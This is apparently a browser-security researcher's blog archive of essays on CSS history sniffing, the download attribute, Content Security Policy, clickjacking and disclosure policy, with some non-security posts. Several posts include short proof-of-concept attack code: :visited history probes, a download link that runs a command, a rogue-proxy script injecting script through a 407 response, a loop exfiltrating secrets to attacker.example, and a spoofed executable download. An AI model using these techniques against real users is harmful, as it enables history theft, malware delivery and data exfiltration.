
June 22, 2014

Boolean algebra with CSS (when you can only set colors)

Depending on how you look at it, CSS can be considered Turing-complete. But in one privacy-relevant setting - when styling :visited links - the set of CSS directives you can use is extremely limited, effectively letting you control not much more than the color of the text nested between <a href=...> and </a>. Can you perform any computations with that?

Well, as it turns out, you can - in a way. Check out this short write-up for a discussion on how to implement Boolean algebra by exploiting an interesting implementation-level artifact of CSS blending to steal your browsing history a bit more efficiently than before.
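
To give a rough sense of the underlying trick (this is a simplified sketch rather than the actual PoC; it assumes a blend mode such as mix-blend-mode: multiply, and the URLs are made up): stack two links on top of each other, draw each in white only when :visited, and let the blending math do the logic. The multiplied pixel comes out white only if both URLs are in the browsing history - a Boolean AND computed entirely by the rasterizer; a "screen" blend (over a black backdrop) would give you OR instead.

  <style>
    .gate            { position: relative; background: #fff;
                       width: 12px; height: 12px; }
    .gate a          { position: absolute; top: 0; left: 0;
                       color: #000; text-decoration: none;
                       mix-blend-mode: multiply; }
    .gate a:visited  { color: #fff; }
  </style>

  <div class="gate">
    <a href="https://site-a.example/">&#9608;</a>
    <a href="https://site-b.example/">&#9608;</a>
  </div>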

Vulnerability logo and vanity domain forthcoming - stay tuned.

March 20, 2014

Messing around with <a download>

Not long ago, the HTML5 specification extended the semantics of <a href=...> links by adding the download attribute. In a nutshell, the markup allows you to specify that an outgoing link should always be treated as a download, even if the hosting site does not serve the file with Content-Disposition: attachment:

<a href="http://i.imgur.com/b7sajuK.jpg" download>What a cute kitty!</a>

I am unconvinced that this feature scratches any real itch for HTTP links, but it's already supported in Firefox, Chrome, and Opera.

Of course, there are some kinks: in the absence of the Content-Disposition header, the browser needs to figure out the correct file name for the download. In practice, this is always done based on the path seen in the URL. That's not great, because a good majority of web frameworks will tolerate trailing garbage in the path segment; indeed, so does imgur.com. Let's try it out:

<a href="http://i.imgur.com/b7sajuK.jpg/KittyViewer.exe" download>What a cute kitty!</a>

But we shouldn't dwell on this, because the download syntax makes it easy for the originating page to simply override that logic and pick any file name and extension it likes:

<a href="http://i.imgur.com/b7sajuK.jpg" download="KittyViewer.exe">What a cute kitty!</a>

That's odd - and keep in mind that the image we are seeing is at least partly user-controlled. A location like this can be found on any major destination on the Internet: if not an image, you can always find a JSON API or an HTML page that echoes something back.

It also helps to remember that it's usually pretty trivial to build files that are semantically valid to more than one parser, and have a different meaning to each one of them. Let's put it all together for a trivial PoC:

<a href="http://api.bing.com/qsonhs.aspx?q=%22%26notepad%26"
  download="AltavistaToolbar.bat">Download Bing toolbar from bing.com</a>

That's pretty creepy: if you download the file on Windows and click "open", the payload will execute and invoke notepad.exe. Still, is it a security bug? Well... the answer to that is not very clear.

For one, there is a temptation to trust the tooltip you see when you hover over a download link. But if you do that, you are in serious trouble, even in the absence of that whole download bit: JavaScript code can intercept the onclick event and take you somewhere else. Luckily, most browsers provide you with a real security indicator later on: the download UI in Internet Explorer, Firefox, and Safari prominently shows the origin from which the document is being retrieved. And that's where the problem becomes fairly evident: bing.com never really meant to serve you with an attacker-controlled AltavistaToolbar.bat, but the browser says otherwise.

The story gets even more complicated when you consider that some browsers don't show the origin of the download in the UI at all; this is the case for Chrome and Opera. In such a design, you simply have to put all your faith in the origin from which you initiated the download. In principle, it's not a completely unreasonable notion, although I am not sure it aligns with user expectations particularly well. Sadly, there are other idiosyncrasies of the browser environment that mean the download you are seeing on a trusted page might have been initiated from another, unrelated document. Oops.

So, yes, browsers are messy. Over the past few years, I have repeatedly argued against <a download> on the standards mailing lists (most recently in 2013), simply because I think that nothing good comes out of suddenly taking control over how documents are interpreted by the browser away from the hosting site. I don't think that my arguments were particularly persuasive, in part because nobody seemed to have a clear vision for the overall trust model around downloads on the Web.

PS. Interestingly, Firefox decided against the added exposure and implemented the semantics in a constrained way: the download attribute is honored only if the final download location is same-origin with the referring URL.

November 12, 2013

american fuzzy lop

Well, it's been a while, but I'm happy to announce a new fuzzing tool, aptly named american fuzzy lop: In essence, it's a practical (!) fuzzer for binary data formats that achieves great coverage and automatically synthesizes unique and interesting test cases based on a much smaller set of input files.

For an example of a bug found with afl, check out this advisory. Peace out.

May 04, 2013

And on a completely unrelated note...

...I think it's hilarious to mix several completely unrelated interests that appeal to very disjoint audiences on a single blog, so here is another article that I have recently written for MAKE: "Resin Casting: Going from CAD to Engineering-Grade Parts".

In my earlier article written for their blog, I expressed an opinion that some of the most pervasive barriers to home manufacturing do not lie with the availability of cutting-edge tools - but rather, with a very limited awareness of the well-established design and manufacturing processes that lead to durable, aesthetic, and functional parts.

The new article sheds some light on one of the best ways to progress from CNC-machined or 3D-printed shapes to components that match or outperform high-end injection-molded prototypes. In the extremely unlikely case that this is of any interest to you - enjoy!

Some harmless, old-fashioned fun with CSS

Several years ago, the CSS :visited pseudo-selector caused a bit of a ruckus: a malicious web page could display a large set of links to assorted destinations on the Internet, and then peek at how they were rendered to get a snapshot of your browsing history.

Several browser vendors addressed this problem by severely constraining the styling available from within the :visited selector, essentially letting you specify text color and not much more. They also limited the visibility of the styled attributes through APIs such as window.getComputedStyle(). This fix still permitted your browsing history to be examined through mechanisms such as cache timing or the detection of 40x responses for authentication-requiring scripts and images from a variety of websites. Nevertheless, it significantly limited the scale of the probing you could perform in a reliable and non-disruptive way.

Of course, many researchers have pointed out the obvious: that if you can convince the user to interact with your website, you can probably tell what color he is seeing without asking directly. A couple of extremely low-throughput attacks along these lines have been demonstrated in the past - for example, the CAPTCHA trick proposed by Collin Jackson.

So, my belated entry for this contest is this JavaScript clone of "Asteroids". It has a couple of interesting properties:
  • It's not particularly outlandish or constrained - at least compared to the earlier PoCs with CAPTCHAs or chess boards.

  • It collects information without breaking immersion. This is done by alternating between "real" and "probe" asteroids. The real ones are always visible and are targeted at the spaceship; if you don't take them down, the game ends. The "probe" asteroids, which may or may not be visible to the user depending on browsing history, seem as if they are headed for the spaceship, too - but if not intercepted, they miss it by a whisker (a bare-bones sketch of the probe markup follows this list).

  • It is remarkably high-bandwidth. Although the PoC tests only a handful of sites, it's possible to test hundreds of URLs in parallel by generating a very high number of "probe" asteroids at once. A typical user will have visited only a small fraction of the URLs in any sufficiently large data set, so only a tiny fraction of the probes would actually be visible on the screen. In fact, the testing could be easily rate-limited based on how frantic the user's mouse movements have been in the past second or so.

  • It's pretty reliable due to the built-in "corrective mechanisms" for poor players.
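
For the record, the probe mechanism itself boils down to little more than the snippet below - a bare-bones sketch with hypothetical URLs and styling, not the actual game code. Probes are simply links drawn in the background color unless the URL happens to be in the victim's history:

  <style>
    #playfield                 { background: #000; }
    #playfield a.probe         { color: #000; text-decoration: none; } /* blends into the background */
    #playfield a.probe:visited { color: #fff; }                        /* shows up as an asteroid    */
  </style>

  <div id="playfield">
    <a class="probe" href="https://some-bank.example/login">&#9679;</a>
  </div>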

February 20, 2013

Firefox: HTTPS and response code 407

Today's release of Firefox 19.0 fixes an interesting bug that I reported to the vendor back in October 2012. In essence, an attacker on an untrusted network could first coerce the browser to use a rogue HTTP proxy (this can be done by leveraging the WPAD protocol); wait until the browser attempts to download an HTTPS document from an interesting site through said proxy; and then selectively respond to the appropriate CONNECT request with a plain-text message such as this:

  HTTP/1.0 407 Boink
  Proxy-Authenticate: basic
  Connection: close
  Content-Type: text/html

  <html>
  <h1>Hi, mom!</h1>
  <script>alert(location.href)</script>
  [...additional padding follows...]

The browser would show the user a cryptic authentication prompt - but hitting ESC or pressing cancel would inevitably result in the proxy-supplied plain-text document being rendered in the same-origin context of the requested HTTPS site. There goes the transport security - so I guess that's an oops? :-)
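
To make the moving parts a bit more tangible, here is a minimal sketch of the rogue-proxy side of the attack. It is purely illustrative: it assumes Node.js, and unlike a real attack, it makes no attempt to selectively target a CONNECT request for any particular site:

  var net = require('net');

  // The plain-text 407 response returned in lieu of tunneling the CONNECT.
  var payload = [
    'HTTP/1.0 407 Boink',
    'Proxy-Authenticate: basic',
    'Connection: close',
    'Content-Type: text/html',
    '',
    '<html>',
    '<h1>Hi, mom!</h1>',
    '<script>alert(location.href)</script>',
    '<!-- ...additional padding follows... -->',
    ''
  ].join('\r\n');

  net.createServer(function(socket) {
    socket.once('data', function(data) {
      if (data.toString().indexOf('CONNECT ') === 0) {
        // Answer the HTTPS tunnel request with plain text instead.
        socket.end(payload);
      } else {
        socket.end();
      }
    });
  }).listen(8080, function() {
    console.log('rogue proxy listening on :8080');
  });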

February 14, 2013

Boring non-security updates strike again!

My next book is coming out probably by the end of the year, and the remaining three readers should not be expecting frequent updates to this blog until then :-) Nevertheless, here are several tidbits not related to security in any way: If this sort of stuff floats your boat, you may also want to follow me on G+. In a couple of weeks, I should have several interesting browser bugs to share. Until then, carry on!

November 16, 2012

Lessons in history

Good news - I'm working on another book!

In the meantime, here's an interesting and forgotten page from the history of JavaScript that I stumbled upon thanks to Tavis. It's a long read, edited a bit for clarity; it's also a fascinating account of how close we came to replacing the same-origin policy - its faults notwithstanding - with something much worse than that:

"The security model adopted by Navigator 2.0 and 3.0 is functional, but suffers from a number of problems. The [same-origin policy] that prevents one script from reading the contents of a window from another server is a particularly draconian example. This [policy] means that I cannot write a [web-based debugger] and post it on my web site for other developers to use [in] their own JavaScript. [Similarly, it] prevents the creation of JavaScript programs that crawl the Web, recursively following links from a given starting page."

"Because of the problems with [the same-origin policy], and with the theoretical underpinnings of [this class of security mechanisms], the developers at Netscape have created an entirely new security model. This new model is experimental in Navigator 3.0, and may be enabled by the end user through a procedure outlined later in this section. The new security model is theoretically much stronger, and should be a big advance for JavaScript security if it is enabled by default in Navigator 4.0."

"[Let's consider] the security problem we are worried about in the first place. For the most part, the problem is that private data may be sent across the Web by malicious JavaScript programs. The [SOP approach] patches this problem by preventing JavaScript programs from accessing private data. Unfortunately, this approach rules out non-malicious JavaScript [code that wants to use this data] without exporting it."

"Instead of preventing scripts from reading private data, a better approach would be to prevent them from exporting it, since this is what we are trying to [achieve] in the first place. If we could do this, then we could lift most of the [restrictions] that were detailed in the sections above."

"This is where the concept of data tainting comes in. The idea is that all JavaScript data values are given a flag. This flag indicates if the value is "tainted" (private) or not. [Tainted values will be prevented] from being exported to a server that does not already "own" it. [...] Whenever an attempt to export data violates the tainting rules, the user will be prompted with a dialog box asking them whether the export should be allowed. If they so choose, they can allow the export."

Of course, tainting would not have prevented malicious JavaScript from relaying the observations about the tainted data to parties unknown.
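
A hypothetical sketch of why: even if the secret itself can never be exported, a script can still branch on it and export its own, perfectly untainted observations, reconstructing the value one character at a time (the logging URL below is made up):

  function leak(secret) {
    for (var i = 0; i < secret.length; i++) {
      for (var c = 0; c < 256; c++) {
        if (secret.charCodeAt(i) === c) {
          // Nothing tainted appears in this URL - only the attacker's own
          // loop counters - yet together they encode the secret exactly.
          new Image().src = 'https://attacker.example/log?pos=' + i + '&chr=' + c;
        }
      }
    }
  }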

June 08, 2012

This page is now certified

Oh, you're welcome.

(Yeah, I made these.)

May 30, 2012

Yes, you can have fun with downloads

It is an important and little-known property of web browsers that one document can always navigate other, non-same-origin windows to arbitrary URLs; in more limited circumstances, even individual frames can be targeted. I discuss the consequences of this behavior in The Tangled Web - and several months ago, I shared this amusing proof-of-concept illustrating the perils of this logic. Today, I wanted to showcase a more sneaky consequence of this design - and depending on who you ask, one that is possibly easier to prevent.

What's the issue, then? Well, it's pretty funny: predictably but not very intuitively, the attacker may initiate such cross-domain navigation not only to point the targeted window to a well-formed HTML document - but also to a resource served with the Content-Disposition: attachment header. In this scenario, the address bar of the targeted window will not be updated at all - but a rogue download prompt will appear on the screen, attached to the targeted document.
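
A minimal sketch of what the attacking page needs to do (the URLs are placeholders, and the file on the attacker's server is assumed to be served with Content-Disposition: attachment):

  <script>
    // Open the site the victim trusts - or reuse any window handle the
    // attacker already holds; cross-origin navigation is permitted.
    var w = window.open('https://www.adobe.com/products/flashplayer.html');

    // Once the victim has had a moment to recognize the page, point the
    // same window at the rogue download. The visible page and its address
    // bar stay put; only a download prompt appears.
    setTimeout(function() {
      w.location = 'https://attacker.example/flash11_updater.exe';
    }, 5000);
  </script>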

Here's an example of how this looks in Chrome; the fake flash11_updater.exe download supposedly served from adobe.com is, in reality, supplied by the attacker:

All the top three browsers are currently vulnerable to this attack; some provide weak cues about the origin of the download, but in all cases, the prompt is attached to the wrong window - and the indicators seem completely inadequate.

You can check out the demo here:

The problem also poses an interesting challenge to sites that frame gadgets, games, or advertisements from third-party sources; even HTML5 sandboxed frames permit the initiation of rogue downloads (oops!).

Vendor responses, for the sake of posterity:

  • Chrome: reported March 30 (bug 121259). Fix planned, but no specific date set.

  • Internet Explorer: reported April 1 (case 12372gd). The vendor will not address the issue with a security patch for any current version of MSIE.

  • Firefox: reported March 30 (bug 741050). No commitment to fix at this point.

I think these responses are fine, given the sorry state of browser UI security in general; although in good conscience, I can't dismiss the problem as completely insignificant.

April 09, 2012

Well, I'm in a bit of a pickle...

I can't yet publish an interesting bug I hoped to share; I also don't want to rehash my earlier points about vulnerability trade, even as the debate has flared up again, thanks to the unfashionably late attention from Forbes and EFF.

So what I wanted to do instead is, once again, annoy the few remaining readers with my hobbyist work. Specifically, I wanted to showcase three things:

  • Omnibot, an interesting robot with a reconfigurable drivetrain,
  • Cycloidal drive, a mini-project to make an unorthodox type of transmission,
  • Adventures in CNC, my semi-humorous summary of my experiences with home manufacturing.

Sorry about that, and may fortune be with you from now on!

February 12, 2012

It's this time of the year again

Yeah, welcome to the 2012 edition of the full disclosure debate!

As usual, there are reasonable people who disagree about the merits of non-coordinated disclosure; a more recent trend is to debate the value of developing and publishing exploits, even for already patched bugs. The short-term risks are pretty clear to any sensible person: there is robust data to show that the availability of functioning exploits drives a good chunk of low-tier, large-scale attacks.

The long-term benefits are more speculative. I like to think of it as a necessary evil: non-disclosure does not prevent sophisticated and resourceful attackers from developing their own exploits and going after high-value targets, but it quickly leads to complacency when it comes to fixing the underlying problems and monitoring your infrastructure. We would not have Windows Update, silent autoupdates in Chrome, or MacOS X ASLR improvements were it not for the constant stream of public exploits and the accompanying attacks.

The cost-benefit calculation here is mostly a matter of personal taste, and we won't be able to settle it any time soon. I'm a bit on the fence, too: I am at best ambivalent about the merits of exploit packs and frameworks such as CORE Impact or Metasploit. I am also deeply uncomfortable with exploit trading, a trend all-too-eagerly embraced and supported by the industry.

But the merits of the debate aside, there is a disturbing propensity for parties who struggled with security response, and have sometimes adopted openly hostile tactics to suppress security research, to be on the front lines of the anti-disclosure movement. This is why I couldn't help but find parallels between Brad Arkin's recent statements, and a position taken ten years ago by Scott Culp. Brad says:

"My goal isn't to find and fix every security bug. I'd like to drive up the cost of writing exploits. But when researchers go public with techniques and tools to defeat mitigations, they lower that cost. [...] Too much attention is being paid these days to responding to vulnerability reports instead of focusing on blocking live exploits."

"[We need to] work closer with the research community to curb the publication of information that can help malicious hackers. [...] Something hard becomes very very easy. These exploits and techniques are copied, adapted and modified very cheaply."

We all agree that bug-free products are not a realistic goal, but reducing the availability of information is probably also an ill-advised one. If it's still possible to write an exploit, and just "expensive" to do so - for example, because the knowledge on how to bypass ASLR is not common - then indeed, unskilled attackers will be less likely to go after your mom's credit card information; but going after her bank will be fair game.

As for unintended consequences: in this scenario, the bank no longer has to deal with a steady stream of nuisance malware, so they probably care less about patching and monitoring, and the attacker is more likely to succeed.

Sure, one shouldn't be running on a vulnerability response treadmill. We can escape it to some extent simply by making the process more agile and lightweight. It is also very important to reduce the likelihood of malicious exploitation, but we should do so by tweaking factors other than the "cost" of acquiring domain-specific knowledge. We should embrace proactive approaches such as sensible coding practices, developer education, fuzzing, or tools such as ASLR, JIT randomization, and sandboxing - and when something slips through the cracks, we need to be thankful for the data point and simply make our solution more robust. Let's not obsess about what specific flavor of disclosure policies the researchers believe in: they haven't sold it to the highest bidder, and that's already pretty good.

"We have patched hundreds of CVEs over the last year. But, very, very few exploits have been written against those vulnerabilities. Over the past 24 months, we’ve seen about two dozen actual exploits."

That's a frighteningly high number of exploits, by the way.

January 10, 2012

p0f is back!

I decided to spend some time rewriting and greatly improving my ancient but strangely popular passive fingerprinting tool: Version 3 is a complete rewrite, bringing you much improved SYN and SYN+ACK fingerprinting capabilities, auto-calibrated uptime measurements, completely redone databases and signatures, new API design, IPv6 support (who knows, maybe it even works?), stateful traffic inspection with thorough cross-correlation of collected data, application-level fingerprinting modules (for HTTP now, more to come), and a lot more.

December 19, 2011

Notes about the post-XSS world

Content Security Policy is gaining steam, and we've seen a flurry of other complementary approaches that share a common goal: to minimize the impact of markup injection vulnerabilities by preventing the attacker from executing unauthorized JavaScript. We are so accustomed to thinking about markup injection in terms of cross-site scripting that we don't question this approach - but perhaps we should?

This collection of notes is a very crude thought experiment in imagining the attack opportunities in a post-XSS world. The startling realization I had by the end of that half-baked effort is that the landscape would not change that much: The hypothetical universal deployment of CSP places some additional constraints on what you can do, but the differences are not as substantial as you may suspect. In that sense, the frameworks are conceptually similar to DEP, stack canaries, or ASLR: They make your life harder, but reliably prevent exploitation far less frequently than we would have thought.

Credit where credit is due: The idea for writing down some of the possible attack scenarios comes from Mario Heiderich and Elie Bursztein, who are aiming to write a more coherent and nuanced academic paper on this topic, complete with vectors of their design, and some very interesting 0-day bugs; I hope to be able to contribute to that work. In the meantime, though, it seems that everybody else is thinking out loud about the same problems - including Devdatta Akhawe and Collin Jackson - so I thought that sharing the current notes may be useful, even if the observations are not particularly groundbreaking.

December 10, 2011

X-Frame-Options, or solving the wrong problem

On modern computers, JavaScript allows you to exploit the limits of human perception: you can open, reposition, and close browser windows, or load and navigate away from specific HTML documents, without giving the user any chance to register this event, let alone react consciously.

I have discussed some aspects of this problem in the past: my recent entry showcased an exploit that flips between two unrelated websites so quickly that you can't see it happening; and my earlier geolocation hack leveraged the delay between visual stimulus and premeditated response to attack browser security UIs.

A broader treatment of these problems - something that I consider to be one of the great unsolved problems in browser engineering - is given in "The Tangled Web". But today, I wanted to showcase another crude proof-of-concept illustrating why our response to clickjacking - and the treatment of it as a very narrow challenge specific to mouse clicks and <iframe> tags - is somewhat short-sighted. So, without further ado:

There are more complicated but comprehensive approaches that may make it possible for web applications to ensure that they are given a certain amount of non-disrupted, meaningful screen time; but they are unpopular with browser vendors, and unlikely to fly any time soon.

December 08, 2011

The old switcharoo

Another tiny proof-of-concept for the day: While the idea is fairly trivial, it seems pretty frightening to me - and neatly illustrates one of the points I'm making in The Tangled Web. I highly doubt that even the most proficient and attentive users would be able to spot this happening in the wild.

(If you don't get it, try again, and follow instructions on the screen.)

Interesting results can be also achieved in some browsers with history.back(), but I'll leave this as an exercise for readers. The same goes for the implications it has for clickjacking, drag-and-drop, and other attacks normally associated with frames.

PS. Another silly proof-of-concept as a bonus: click here.

December 02, 2011

CSS :visited may be a bit overrated

OK, second time is a charm. This script is probably of some peripheral interest: In the past two years or so, a majority of browser vendors decided to take a drastic step of severely crippling CSS :visited selectors in order to prevent websites from stealing your browsing history.

It is widely believed that techniques such as cache timing may theoretically offer comparable insights, but the attacks demonstrated so far seemed unconvincing. Among other faults, they relied on destructive, one-shot testing that altered the state of the examined cache; produced only probabilistic results; and were far too slow and noisy to be practically useful. Consequently, no serious attempts to address the underlying weakness have been made.

My proof of concept is fairly crude, and will fail for a minority of readers; but in my testing, it offers reliable, high-performance, non-destructive cache inspection that blurs the boundary between :visited and all the "less interesting" techniques.

November 15, 2011

"The Tangled Web" is out

Okay, okay, it's official. You can now buy The Tangled Web from Amazon, Barnes & Noble, and all the other usual retailers for around $30. You can also order directly from the publisher, in which case, discount code 939758568 gets you 30% off.

No Starch provides a complimentary, DRM-free PDF, Mobi, and ePub bundle with every paper copy; you can also buy the e-book edition separately. Kindle and other third-party formats should be available very soon.

More info about the book itself, including a sample chapter, can be found on this page.

November 04, 2011

In praise of anarchy: metrics are holding you back

It is comforting to think about information security as a form of computer science - but the reality of securing complex enterprises is as unscientific as it gets. We can theorize about how to write perfectly secure software, but no large organization will ever be in a meaningful vicinity of that goal. We can also try to objectively measure our performance, and the resilience of our defenses - but by doing so, we casually stroll into a trap.

Why? I think there are two qualities that make all the difference in our line of work. One of them is adaptability - the capacity to identify and respond to new business circumstances and incremental risks that appear every day. The other is agility - the ability to make changes really fast. Despite its hypnotic allure, perfection is not a practical trait; in fact, I'm tempted to say that it is not that desirable to begin with.

Almost every framework for constructing security metrics is centered around that last pursuit - perfection. It may not seem that way, but it's usually the bottom line: the whole idea is to entice security teams to define more or less static benchmarks of their performance. From that follows the focus on continually improving the readings in order to demonstrate progress.

Many frameworks also promise to advance one's adaptability and agility, but that outcome is very seldom true. These two attributes depend entirely on having bright, inquisitive security engineers thriving in a healthy corporate culture. A dysfunctional organization, or a security team with no technical insight, will find false comfort in a checklist and a set of indicators - but will not be able to competently respond to the threats they need to worry about the most.

A healthy team is no better off: they risk being lulled into complacency by linking their apparent performance to the result of a recurring numerical measurement. It's not that taking measurements is a bad idea; in fact it's an indispensable tool of our trade. But using metrics as long-term performance indicators is a very dangerous path: they do not really tell you how secure you are, because we have absolutely no clue how to compute that. Instead, by focusing on hundreds of trivial and often irrelevant data points, they take your eyes off the new and the unknown.

And this brings me to the other concern: the existence of predefined benchmarks impairs flexibility. Quite simply, yesterday's approach, enshrined in quarterly statistics and hundreds of pages of policy docs, will always overstay its welcome. It's not that the security landscape is constantly undergoing dramatic shifts; but if you don't observe the environment and adjust your course and goals daily, the errors do accumulate... until there is no going back.

October 28, 2011

Good news, everyone!

No Starch Press just posted a sample chapter for The Tangled Web. You can grab the PDF here and see what it's all about. The book itself should be available by November 15; you can also preorder on Amazon.

If you don't know what this is all about, you can also head over to the home page of the book; but the bottom line is that I think it's the first-ever reasonably detailed examination of the browser security model and its evolution through the years - and really, that's something you just need to know to develop modern web apps.

PS. It's apparently always April Fools' at Microsoft!

October 02, 2011

An origin is forever

This post is inspired chiefly by the work of Artur Janc.

The Internet is a pretty seedy place, yet we are quite willing to hand over our secrets to a small group of trusted web apps. Heck, in recent years, we also started giving them capabilities: social networking sites often get to see your geolocation, and your instant messenger may be able to access your microphone or webcam feeds. Some of this does not even require your initial consent: certain browsers and plugins come with hardcoded domains that are permitted to install software updates, or change system settings at a whim.

The push toward web application capabilities is somewhat frightening once you realize that the boundaries between web applications are very poorly defined, and that nobody is trying to solve that uncomfortable problem first. Look at the scoping rules for JavaScript DOM access, for HTTP cookies, and for auxiliary mechanisms such as password managers: they not only differ substantially, but routinely interfere with each other in destructive ways. Compartmentalizing complex web applications should be a breeze, but instead, it's an impenetrable form of art.
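
To illustrate just one of these mismatches, with hypothetical hostnames:

  <script>
    // Same-origin policy: https://app.example.com and
    // https://app.example.com:8443 are distinct origins - no DOM access
    // and no XHR between them without CORS.

    // Cookies: the port is ignored entirely, and the domain attribute
    // below makes the cookie visible to payments.example.com and every
    // other subdomain, too.
    document.cookie = 'session=abc123; domain=example.com; path=/; secure';
  </script>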

Worse, content isolation on the web is very superficial - so even if the boundaries can be drawn, most types of privileged contexts can't distance themselves from the rest of the world, and expose just a handful of well-defined APIs. Instead, every non-trivial web application needs to heavily compensate for the risk of clickjacking, cross-request forgery, reflected cross-site scripting, and dozens of other attacks of that sort. All the developers eventually fail, by the way: show me a domain with no history of XSS, and I will show you a web application nobody cares about.

Unlike some other tough challenges in browser engineering, the risks of living with privileged applications could be mitigated fairly nicely simply by requiring some effort up front: even without inventing any new security mechanisms, you could require applications to use origin cookies, have a sensible CSP policy, and use HSTS, before being allowed to prompt for extra privileges. It's not impossible to do something meaningful - it's just unpopular with the creators of privileged APIs.

But the problems with the clarity and robustness of application boundaries aside, there is also a third, perhaps more fascinating issue: what do you do if your web application execution context becomes corrupted in some way? As it turns out, there is no mechanism for the server to say that from now on, it wants to have a clean slate, and that the browser should drop or at least isolate any already running code, or previously stored data.

This seemingly odd wish is actually critical to web application security. For example, let's assume there is an XSS vulnerability in a web mail system or a social networking application. Because of the convenient but unfortunate design of HTML, such vulnerabilities are unavoidable, but we seldom wonder if it's possible to cleanly and predictably recover from them. Intuitively, patching the underlying bug, invalidating session cookies, and perhaps forcing password change, is all it should take; in fact, applications using httponly cookies can often skip the last two steps.

Alas, a once-compromised web origin can stay tainted indefinitely. At the very minimum, the attacker is in full control for as long as the user keeps the once-affected website open in any browser window; with the advent of portable computers, it is not uncommon for users to keep a single commonly used website open for weeks. During that period, there is nothing the legitimate owner of the site can do - and in fact, there is no robust way to gauge if the infection is still going on. And hey, it gets better: if content from the compromised origin is commonly embedded on third-party pages (think syndicated "like" buttons or advertisements), with some luck, the attacker's JavaScript may become practically invincible, surviving the closing of the original application and the deletion of the browser cache. If that doesn't give you pause, it should.

And let's not forget open wireless networks: the problem there is about as bad. It does not matter that you are not logged into anything sensitive while visiting Starbucks. An invisible frame, a strategic write to localStorage, or a bit of DNS or cache poisoning, is all it takes for the attacker to automatically elevate his privileges the moment you return to a safe environment and log back in.
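
A hypothetical sketch of the localStorage variant, assuming an application that later injects stored data into the DOM without re-sanitizing it:

  <script>
    // Planted while the attacker briefly controls http://victim.example
    // (open Wi-Fi, cache or DNS poisoning, a transient XSS, and so on):
    localStorage.setItem('cached_template',
        '<img src=x onerror="/* attacker code runs again, much later */">');

    // Weeks later, on a safe network, the legitimate application does
    // something like:
    //   container.innerHTML = localStorage.getItem('cached_template');
    // ...and the stale payload comes right back to life.
  </script>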

With all that, and with the proliferation of mechanisms such as web workers and offline apps, we are rapidly approaching a point where recovering from a trivial XSS bug and other common web security lapses is getting almost as punishing as recovering from RCE - and for no good reason, too. Sure: today, it's so easy to phish users or exploit real RCE bugs, that backdooring web origins is not worth the effort. But in a not-too-distant future, that balance may shift.

September 09, 2011

Critical (of) severity

You can tell when a person is desperate to appear authoritative: they often litter their speech with unnecessary, roundabout verbiage. To some listeners, this sounds smart. To many others, it's obtuse and pompous.

I think that one of the cornerstones of vulnerability management is just an example of that. I am talking about the concept of vulnerability severities: I believe that they serve no real purpose, other than obfuscating the true intent of speech.

It's not that we don't need a codified taxonomy; but the term "severity" and the abstract levels attached to it ("critical", "high", "medium", "low") are a remarkably poor proxy for what we actually want to say.

The notion of severity is used in two distinct settings:

  • In a position of authority: For example, when an internal security team is communicating with developers. In this case, the intent of assigning severity is to instruct the developer to do one of the following:

    • Drop all other work and fix the bug now.
    • Fix the issue in a couple of days.
    • Fix at own leisure, or not at all.

  • In an advisory position: Say, when a vendor is notifying end users about the availability of a fix. In this case, the actual message usually is any of the following:

    • You are in imminent danger. Patch now.
    • You are at a limited risk, but prompt action is advisable.
    • We don't think there is a substantial risk.

Every time, the messages are very simple. Yet, instead of just saying it out loud, we create one set of guidelines for the security team to map their assessment to an ambiguous codeword; and then furnish a second lengthy phrasebook for the final recipient of a message, to map the codeword to something they can act on.

Only we're not running a numbers station: we're trying to tell people something very important, and we need them to understand us right away. There is no way around the fact that terms such as "critical" or "high" intuitively mean different things to different people, and almost certainly not just the thing you actually wanted to say. If the severity needs to be accompanied with several pages of organization-specific explanatory text, something is horribly wrong.

Instead of "highly critical", just start telling your users "patch right away".

August 29, 2011

So you want to write a security book?

Now that I am done with my side project, I wanted to post a note about something that my colleagues frequently ask about: the reality of publishing a security-themed book.

The most important advice I can give is to start with a reality check: writing for technical audiences will probably not make you rich. You will invest somewhere between 200 and 1,000 hours of work over the course of several months. In the next two years, you will likely sell from 1,000 to 50,000 copies (10,000 is pretty good already). Your cut is between $2 and $5 per copy (that's 10-20% of the actual sale price, which in turn is usually around 50% of the cover price); proportionally less if there are multiple authors involved.
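
To make that concrete: a $40 cover price typically means a sale price of around $20, so a 15% royalty works out to roughly $3 per copy; a respectable run of 10,000 copies therefore brings in about $30,000, spread over those several hundred hours of work.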

The bottom line is that your motivation needs to be something other than money. If there are no quality, up-to-date reference materials in your field of expertise, or if you just have something interesting to share, go for it. If you just want to earn some cash, random consulting gigs would net you more.

If you are still serious about the plan, the next step is choosing between a traditional publisher, and doing all the work yourself. I recommend the former. There are some reputable self-published security books (say, Fyodor's), and if you pursue this route, you will be able to get a slightly larger slice of the revenue pie. That said, you lose some important benefits:

  • You will not get professional editorial feedback. Having an independent sanity check from a person who publishes books for a living helps you set the style and flow of the chapters, and arrange them reasonably. This is harder than it seems. Even the best ideas look bad when presented poorly.

  • You will have to take care of technical illustrations, page layout, indexes, and so on - requiring some talent, and easily adding 50-100 hours of work into the mix.

  • You will have to pay for technical editing and proofreading - or ship the book with typos and grammar errors, which never helps.

  • You will have to invest some effort into marketing, accounting, etc.

If you have a decent proposal, you can approach publishers out of the blue, and pick the one you want to work with; for the time being, the demand for infosec authors seems to be higher than the supply. All the publishers will offer you roughly the same financial terms, but there are some interesting differences in what you will get in return. I know quite a few authors who signed up with one of the major publishing houses and are very unhappy about not receiving any editorial attention past the first chapter or two, or about not being able to get an illustrator assigned to the project and having to do the work themselves. In these cases, one has to wonder what the publisher is doing to earn its fees.

So, ask around. For example, in comparison to said publisher, my experiences with No Starch Press have been very good.

August 26, 2011

The subtle / deadly problem with CSP

Content Security Policy is a promising new security mechanism deployed in Firefox, and on its way to WebKit. It aims to be many things - but its most important aspect is the ability to restrict the permissible sources of JavaScript code in the policed HTML document. In this capacity, CSP is hoped to greatly mitigate the impact of cross-site scripting flaws: the attacker will need to find not only a markup injection vulnerability, but also gain the ability to host a snippet of malicious JavaScript in one of the whitelisted locations. Intuitively, that second part is a much more difficult task.

Content Security Policy is sometimes criticized on the grounds of its complexity, potential performance impact, or its somewhat ill-specified scope - but I suspect that its most significant weakness lies elsewhere. The key issue is that the granularity of CSP is limited to SOP origins: that is, you can permit scripts from http://www1.mysite.com:1234/, or perhaps from a wildcard such as *.mysite.com - but you can't be any more precise. I am fairly certain that in a majority of real-world cases, this will undo many of the apparent benefits of the scheme.

